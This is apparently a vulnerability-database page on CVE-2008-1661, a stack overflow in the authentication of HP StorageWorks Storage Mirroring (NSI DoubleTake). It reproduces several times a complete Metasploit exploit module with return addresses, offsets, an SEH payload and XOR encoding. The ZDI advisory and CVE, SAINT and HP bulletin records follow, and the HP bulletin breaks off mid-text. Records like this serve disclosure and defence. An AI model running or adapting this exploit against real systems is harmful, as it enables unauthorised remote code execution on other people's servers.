Search...

hpstorage-meta.txt

2008-06-05T00:00:00

ID PACKETSTORM:67006
Type packetstorm
Reporter ri0t
Modified 2008-06-05T00:00:00

Description

                                        
                                            `##  
# $Id: doubletake.rb 4529 2007-03-23 01:08:18Z $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/projects/Framework/  
##  
  
  
require 'msf/core'  
  
module Msf  
  
class Exploits::Windows::Misc::Doubletake &lt; Msf::Exploit::Remote  
include Exploit::Remote::Tcp  
include Exploit::Remote::Seh  
def initialize(info = {})  
super(update_info(info,  
'Name' =&gt; 'doubletake Overflow',  
'Description' =&gt; %q{  
This Module Exploits a stack overflow in the authentication mechanism of NSI Doubletake which is also rebranded  
as hp storage works Vulnerability found by Titon of Bastard Labs.  
},  
'Author' =&gt; [ 'ri0t &lt;ri0t[at]ri0tnet.net&gt;' ],  
'Version' =&gt; '$Revision: 9 $',  
'References' =&gt;   
[  
],  
'DefaultOptions' =&gt;  
{  
'EXITFUNC' =&gt; 'process',  
},  
'Payload' =&gt;  
{  
'Space' =&gt; 500,  
'BadChars' =&gt; "\x00",  
},  
'Platform' =&gt; 'win',  
  
'Targets' =&gt;  
[  
['doubletake 4.5.0', { 'Ret' =&gt; 0x006f5fa7, 'Offset' =&gt; 5544 } ],  
['doubletake 4.4.2', { 'Ret' =&gt; 0x0074e307, 'Offset' =&gt; 944 } ],   
['doubletake 4.5.0.1819', { 'Ret' =&gt; 0x006e62dd, 'Offset' =&gt; 5544 } ],  
],  
'DefaultTarget' =&gt; 0,  
  
'Privileged' =&gt; false,  
  
'DisclosureDate' =&gt; ''  
  
))  
  
register_options(  
[  
Opt::RPORT(1100)  
], self.class)  
end  
  
def exploit  
xor = Rex::Encoding::Xor::Byte  
connect  
  
print_status("Trying target #{target.name}...")  
  
header =   
"\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x00"+  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"+  
"\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01"  
  
filler = rand_text_english(1) * (target['Offset'])  
seh = generate_seh_payload(target.ret)  
buffercoded= xor.encode(seh+payload.encoded, [0xf0].pack("C"))  
sploit = header + filler + buffercoded[0]  
sock.put(sploit)  
handler  
disconnect   
end  
  
end  
end  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:67006", "type": "packetstorm", "bulletinFamily": "exploit", "title": "hpstorage-meta.txt", "description": "", "published": "2008-06-05T00:00:00", "modified": "2008-06-05T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "https://packetstormsecurity.com/files/67006/hpstorage-meta.txt.html", "reporter": "ri0t", "references": [], "cvelist": ["CVE-2008-1661"], "lastseen": "2016-12-05T22:24:22", "viewCount": 2, "enchantments": {"score": {"value": 8.5, "vector": "NONE", "modified": "2016-12-05T22:24:22", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-1661"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:19962", "SECURITYVULNS:VULN:9049", "SECURITYVULNS:DOC:19954"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/MISC/DOUBLETAKE"]}, {"type": "saint", "idList": ["SAINT:09DD3E12D15B67E7F44197EA13FC90E6", "SAINT:75C9046F511CEA7731E1A6FC2396BD66", "SAINT:3A5184D6913841C7D629793491B3D582"]}, {"type": "zdi", "idList": ["ZDI-08-034"]}, {"type": "exploitdb", "idList": ["EDB-ID:5738", "EDB-ID:16450"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82981"]}, {"type": "seebug", "idList": ["SSV:3430"]}], "modified": "2016-12-05T22:24:22", "rev": 2}, "vulnersScore": 8.5}, "sourceHref": "https://packetstormsecurity.com/files/download/67006/hpstorage-meta.txt", "sourceData": "`## \n# $Id: doubletake.rb 4529 2007-03-23 01:08:18Z $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/projects/Framework/ \n## \n \n \nrequire 'msf/core' \n \nmodule Msf \n \nclass Exploits::Windows::Misc::Doubletake < Msf::Exploit::Remote \ninclude Exploit::Remote::Tcp \ninclude Exploit::Remote::Seh \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'doubletake Overflow', \n'Description' => %q{ \nThis Module Exploits a stack overflow in the authentication mechanism of NSI Doubletake which is also rebranded \nas hp storage works Vulnerability found by Titon of Bastard Labs. \n}, \n'Author' => [ 'ri0t <ri0t[at]ri0tnet.net>' ], \n'Version' => '$Revision: 9 $', \n'References' => \n[ \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 500, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n \n'Targets' => \n[ \n['doubletake 4.5.0', { 'Ret' => 0x006f5fa7, 'Offset' => 5544 } ], \n['doubletake 4.4.2', { 'Ret' => 0x0074e307, 'Offset' => 944 } ], \n['doubletake 4.5.0.1819', { 'Ret' => 0x006e62dd, 'Offset' => 5544 } ], \n], \n'DefaultTarget' => 0, \n \n'Privileged' => false, \n \n'DisclosureDate' => '' \n \n)) \n \nregister_options( \n[ \nOpt::RPORT(1100) \n], self.class) \nend \n \ndef exploit \nxor = Rex::Encoding::Xor::Byte \nconnect \n \nprint_status(\"Trying target #{target.name}...\") \n \nheader = \n\"\\x00\\x02\\x00\\x01\\x27\\x30\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+ \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x36\\x00\\x00\\x00\\x00\"+ \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\"+ \n\"\\x00\\x00\\x00\\x1e\\x00\\x00\\x00\\x01\\x00\\x01\" \n \nfiller = rand_text_english(1) * (target['Offset']) \nseh = generate_seh_payload(target.ret) \nbuffercoded= xor.encode(seh+payload.encoded, [0xf0].pack(\"C\")) \nsploit = header + filler + buffercoded[0] \nsock.put(sploit) \nhandler \ndisconnect \nend \n \nend \nend \n \n`\n"}

{"cve": [{"lastseen": "2020-10-03T11:50:58", "description": "Stack-based buffer overflow in DoubleTake.exe in HP StorageWorks Storage Mirroring (SWSM) before 4.5 SP2 allows remote attackers to execute arbitrary code via a crafted encoded authentication request.", "edition": 3, "cvss3": {}, "published": "2008-06-04T19:32:00", "title": "CVE-2008-1661", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1661"], "modified": "2017-08-08T01:30:00", "cpe": ["cpe:/a:hp:storageworks_storage_mirroring:4.5"], "id": "CVE-2008-1661", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1661", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:storageworks_storage_mirroring:4.5:sp1:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1661"], "description": "Added: 06/16/2008 \nCVE: [CVE-2008-1661](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1661>) \nOSVDB: [45924](<http://www.osvdb.org/45924>) \n\n\n### Background\n\n[HP StorageWorks](<http://h18006.www1.hp.com/storage/>) is a virtualized storage solution for mid-sized customers. \n\n### Problem\n\nA buffer overflow vulnerability in the `**DoubleTake.exe**` process allows remote attackers to execute arbitrary commands by sending a long, specially crafted encoded authentication request. \n\n### Resolution\n\n[Download](<http://www.doubletake.com/products/double-take/default.aspx>) HP StorageWorks Storage Mirroring 4.5 SP2 or 5.0 or higher. \n\n### References\n\n<http://archives.neohapsis.com/archives/bugtraq/2008-06/0015.html> \n<http://www.zerodayinitiative.com/advisories/ZDI-08-034/> \n\n\n### Limitations\n\nExploit works on HP StorageWorks Storage Mirroring 4.5.0.1653. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2008-06-16T00:00:00", "published": "2008-06-16T00:00:00", "id": "SAINT:75C9046F511CEA7731E1A6FC2396BD66", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_swsm_doubletake_auth", "type": "saint", "title": "HP StorageWorks Storage Mirroring DoubleTake.exe encoded authentication overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:33", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1661"], "description": "Added: 06/16/2008 \nCVE: [CVE-2008-1661](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1661>) \nOSVDB: [45924](<http://www.osvdb.org/45924>) \n\n\n### Background\n\n[HP StorageWorks](<http://h18006.www1.hp.com/storage/>) is a virtualized storage solution for mid-sized customers. \n\n### Problem\n\nA buffer overflow vulnerability in the `**DoubleTake.exe**` process allows remote attackers to execute arbitrary commands by sending a long, specially crafted encoded authentication request. \n\n### Resolution\n\n[Download](<http://www.doubletake.com/products/double-take/default.aspx>) HP StorageWorks Storage Mirroring 4.5 SP2 or 5.0 or higher. \n\n### References\n\n<http://archives.neohapsis.com/archives/bugtraq/2008-06/0015.html> \n<http://www.zerodayinitiative.com/advisories/ZDI-08-034/> \n\n\n### Limitations\n\nExploit works on HP StorageWorks Storage Mirroring 4.5.0.1653. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2008-06-16T00:00:00", "published": "2008-06-16T00:00:00", "id": "SAINT:09DD3E12D15B67E7F44197EA13FC90E6", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_swsm_doubletake_auth", "title": "HP StorageWorks Storage Mirroring DoubleTake.exe encoded authentication overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:49", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1661"], "edition": 2, "description": "Added: 06/16/2008 \nCVE: [CVE-2008-1661](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1661>) \nOSVDB: [45924](<http://www.osvdb.org/45924>) \n\n\n### Background\n\n[HP StorageWorks](<http://h18006.www1.hp.com/storage/>) is a virtualized storage solution for mid-sized customers. \n\n### Problem\n\nA buffer overflow vulnerability in the `**DoubleTake.exe**` process allows remote attackers to execute arbitrary commands by sending a long, specially crafted encoded authentication request. \n\n### Resolution\n\n[Download](<http://www.doubletake.com/products/double-take/default.aspx>) HP StorageWorks Storage Mirroring 4.5 SP2 or 5.0 or higher. \n\n### References\n\n<http://archives.neohapsis.com/archives/bugtraq/2008-06/0015.html> \n<http://www.zerodayinitiative.com/advisories/ZDI-08-034/> \n\n\n### Limitations\n\nExploit works on HP StorageWorks Storage Mirroring 4.5.0.1653. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2008-06-16T00:00:00", "published": "2008-06-16T00:00:00", "id": "SAINT:3A5184D6913841C7D629793491B3D582", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_swsm_doubletake_auth", "type": "saint", "title": "HP StorageWorks Storage Mirroring DoubleTake.exe encoded authentication overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T22:30:22", "description": "HP StorageWorks NSI Double Take Remote Overflow Exploit (meta). CVE-2008-1661. Remote exploit for windows platform", "published": "2008-06-04T00:00:00", "type": "exploitdb", "title": "HP StorageWorks NSI Double Take Remote Overflow Exploit meta", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1661"], "modified": "2008-06-04T00:00:00", "id": "EDB-ID:5738", "href": "https://www.exploit-db.com/exploits/5738/", "sourceData": "##\n# $Id: doubletake.rb 4529 2007-03-23 01:08:18Z $\n##\n\n##\n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit\n# Framework web site for more information on licensing and terms of use.\n# http://metasploit.com/projects/Framework/\n##\n\n\nrequire 'msf/core'\n\nmodule Msf\n\nclass Exploits::Windows::Misc::Doubletake < Msf::Exploit::Remote\n\tinclude Exploit::Remote::Tcp\n\tinclude Exploit::Remote::Seh\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\n\t\t\t'Name' => 'doubletake Overflow',\n\t\t\t'Description' => %q{\n\t\t\t\t\tThis Module Exploits a stack overflow in the authentication mechanism of NSI Doubletake which is also rebranded\n\t\t\t\t\tas hp storage works Vulnerability found by Titon of Bastard Labs.\n\t\t\t},\n\t\t\t'Author' => [ 'ri0t <ri0t[at]ri0tnet.net>' ],\n\t\t\t'Version' => '$Revision: 9 $',\n\t\t\t'References' => \n\t\t\t\t[\n\t\t\t\t],\n\t\t\t'DefaultOptions' =>\n\t\t\t\t{\n\t\t\t\t\t'EXITFUNC' => 'process',\n\t\t\t\t},\n\t\t\t'Payload' =>\n\t\t\t\t{\n\t\t\t\t\t'Space' => 500,\n\t\t\t\t\t'BadChars' => \"\\x00\",\n\t\t\t\t},\n\t\t\t'Platform' => 'win',\n\t\t\t\n\t\t\t'Targets' =>\n\t\t\t\t[\n\t\t\t\t\t['doubletake 4.5.0', { 'Ret' => 0x006f5fa7, 'Offset' => 5544 } ],\n\t\t\t\t\t['doubletake 4.4.2', { 'Ret' => 0x0074e307, 'Offset' => 944 } ], \n\t\t\t\t\t['doubletake 4.5.0.1819', { 'Ret' => 0x006e62dd, 'Offset' => 5544 } ],\n\t\t\t\t],\n\t\t\t 'DefaultTarget' => 0,\n\n\t\t\t'Privileged' => false,\n\n\t\t\t'DisclosureDate' => ''\n\n\t\t\t))\n\n\t\t\tregister_options(\n\t\t\t[\n\t\t\t\tOpt::RPORT(1100)\n\t\t\t], self.class)\n\tend\n\n\tdef exploit\n xor = Rex::Encoding::Xor::Byte\n\t\tconnect\n\n\t\tprint_status(\"Trying target #{target.name}...\")\n\n header = \n \"\\x00\\x02\\x00\\x01\\x27\\x30\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x36\\x00\\x00\\x00\\x00\"+\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\"+\n \"\\x00\\x00\\x00\\x1e\\x00\\x00\\x00\\x01\\x00\\x01\"\n\n\t\tfiller = rand_text_english(1) * (target['Offset'])\n\t\tseh = generate_seh_payload(target.ret)\n buffercoded= xor.encode(seh+payload.encoded, [0xf0].pack(\"C\"))\n\t\tsploit = header + filler + buffercoded[0]\n\t\tsock.put(sploit)\n\t\thandler\n\t\tdisconnect\t\n\tend\n\nend\nend\n\n# milw0rm.com [2008-06-04]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/5738/"}, {"lastseen": "2016-02-01T23:53:49", "description": "DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow. CVE-2008-1661. Remote exploit for windows platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1661"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16450", "href": "https://www.exploit-db.com/exploits/16450/", "sourceData": "##\r\n# $Id: doubletake.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in the authentication mechanism of\r\n\t\t\t\t\tNSI Doubletake which is also rebranded as HP Storage Works. This vulnerability\r\n\t\t\t\t\twas found by Titon of Bastard Labs.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'ri0t <ri0t[at]ri0tnet.net>' ],\r\n\t\t\t'Version' => '$Revision: 9669 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2008-1661' ],\r\n\t\t\t\t\t['OSVDB', '45924' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 500,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['doubletake 4.5.0', { 'Ret' => 0x006f5fa7, 'Offset' => 5544 } ],\r\n\t\t\t\t\t['doubletake 4.4.2', { 'Ret' => 0x0074e307, 'Offset' => 944 } ],\r\n\t\t\t\t\t['doubletake 4.5.0.1819', { 'Ret' => 0x006e62dd, 'Offset' => 5544 } ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jun 04 2008'\r\n\t\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(1100)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\theader =\r\n\t\t\t\"\\x00\\x02\\x00\\x01\\x27\\x30\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n\t\t\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x36\\x00\\x00\\x00\\x00\"+\r\n\t\t\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\"+\r\n\t\t\t\"\\x00\\x00\\x00\\x1e\\x00\\x00\\x00\\x01\\x00\\x01\"\r\n\r\n\t\txor = Rex::Encoding::Xor::Byte\r\n\t\tfiller = rand_text_english(1) * (target['Offset'])\r\n\t\tseh = generate_seh_payload(target.ret)\r\n\t\tbuffercoded = xor.encode(seh+payload.encoded, [0xf0].pack(\"C\"))\r\n\t\tsploit = header + filler + buffercoded[0]\r\n\t\tsock.put(sploit)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16450/"}], "zdi": [{"lastseen": "2020-06-22T11:41:00", "bulletinFamily": "info", "cvelist": ["CVE-2008-1661"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett Packard StorageWorks Storage Mirroring. Authentication is not required to exploit this vulnerability. The specific flaw exists in the DoubleTake.exe process bound by default on TCP ports 1100, 1106 and UDP port 1105. During the handling of an encoded authentication request, the process copies the user-supplied login information into a fixed length stack buffer. Sending at least 256 bytes will trigger a stack based buffer overflow due to a vulnerable processing loop. Exploitation of this issue can result in arbitrary code execution.", "modified": "2008-06-22T00:00:00", "published": "2008-06-04T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-08-034/", "id": "ZDI-08-034", "title": "Hewlett-Packard StorageWorks Storage Mirroring Authentication Processing Stack Overflow Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "cvelist": ["CVE-2008-1661"], "description": "ZDI-08-034: HP StorageWorks Storage Mirroring Authentication Processing \r\nStack Overflow Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-08-034\r\nJune 4, 2008\r\n\r\n-- CVE ID:\r\nCVE-2008-1661\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard StorageWorks\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 6051. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Hewlett Packard StorageWorks Storage\r\nMirroring. Authentication is not required to exploit this\r\nvulnerability.\r\n\r\nThe specific flaw exists in the DoubleTake.exe process bound by default\r\non TCP ports 1100, 1106 and UDP port 1105. During the handling of an\r\nencoded authentication request, the process copies the user-supplied\r\nlogin information into a fixed length stack buffer. Sending at least 256\r\nbytes will trigger a stack based buffer overflow due to a vulnerable\r\nprocessing loop. Exploitation of this issue can result in arbitrary code\r\nexecution.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard states:\r\nTo resolve this vulnerability download HP StorageWorks Storage Mirroring\r\nsoftware v4.5 Service Pack 2 (SP2) from Double-Take at the following\r\nURL: http://www.doubletake.com/products/double-take/default.aspx\r\n\r\n-- Disclosure Timeline:\r\n2007-05-22 - Vulnerability reported to vendor\r\n2008-06-04 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Titon of BastardLabs\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nCONFIDENTIALITY NOTICE: This e-mail message, including any attachments,\r\nis being sent by 3Com for the sole use of the intended recipient(s) and\r\nmay contain confidential, proprietary and/or privileged information.\r\nAny unauthorized review, use, disclosure and/or distribution by any \r\nrecipient is prohibited. If you are not the intended recipient, please\r\ndelete and/or destroy all copies of this message regardless of form and\r\nany included attachments and notify 3Com immediately by contacting the\r\nsender via reply e-mail or forwarding to 3Com at postmaster@3com.com. ", "edition": 1, "modified": "2008-06-05T00:00:00", "published": "2008-06-05T00:00:00", "id": "SECURITYVULNS:DOC:19962", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19962", "title": "ZDI-08-034: HP StorageWorks Storage Mirroring Authentication Processing Stack Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:29", "bulletinFamily": "software", "cvelist": ["CVE-2008-1661"], "description": "TCP/1100, TCP/1106, UDP/1105 authentication buffer overflow.", "edition": 1, "modified": "2008-06-05T00:00:00", "published": "2008-06-05T00:00:00", "id": "SECURITYVULNS:VULN:9049", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9049", "title": "HP StorageWorks Storage Mirroring buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "cvelist": ["CVE-2008-1661"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c01362558\r\nVersion: 1\r\n\r\nHPSBST02312 SSRT071428 rev.1 - HP StorageWorks Storage Mirroring Software, Remote Execution of Arbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2008-06-02\r\nLast Updated: 2008-06-02\r\n\r\nPotential Security Impact: Remote execution of arbitrary code. \r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP StorageWorks Storage Mirroring (SWSM) software. This\r\nvulnerability could allow remote execution of arbitrary code. \r\n\r\nReferences: CVE-2008-1661. \r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP StorageWorks Storage Mirroring software v4.5 Service Pack 1. \r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics \r\n===============================================\r\nReference Base Vector Base Score \r\nCVE-2008-1661 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\n===============================================\r\nInformation on CVSS is documented in HP Customer Notice: HPSN-2008-002.\r\nCVSS 2.0 Base Metrics \r\n\r\n\r\nThe Hewlett-Packard Company thanks Titon of BastardLabs working with TippingPoint's Zero Day Initiative for reporting\r\nthis vulnerability to security-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nTo resolve this vulnerability download HP StorageWorks Storage Mirroring software v4.5 Service Pack 2 (SP2) from\r\nDouble-Take at the following URL: http://www.doubletake.com/products/double-take/default.aspx \r\n\r\nNote: Double-Take v5.0 (HP StorageWorks Storage Mirroring software v5.0) is now available for download from the above\r\nURL; this version includes the resolution to the stated vulnerability as well as a broad range of new features and\r\nimprovements. \r\n\r\n\r\nPRODUCT SPECIFIC INFORMATION \r\nNone \r\n\r\nHISTORY \r\nVersion:1 (rev.1) - 2 June 2008 Initial release \r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software\r\nproducts should be applied in accordance with the customer's patch management policy. \r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to:\r\nsecurity-alert@hp.com \r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP,\r\nespecially exploit information. \r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com \r\n Subject: get key\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email: \r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up \r\nUnder Step1: your ITRC security bulletins and patches \r\n - check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems \r\n - verify your operating system selections are checked and save.\r\n\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php \r\nLog in on the web page: Subscriber's choice for Business: sign-in. \r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.\r\n\r\n\r\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do \r\n\r\n\r\n* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of\r\nthe Bulletin number in the title: \r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n \r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually\r\nreviewing and enhancing the security features of software products to provide customers with current secure solutions.\r\n\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP\r\nproducts the important security information contained in 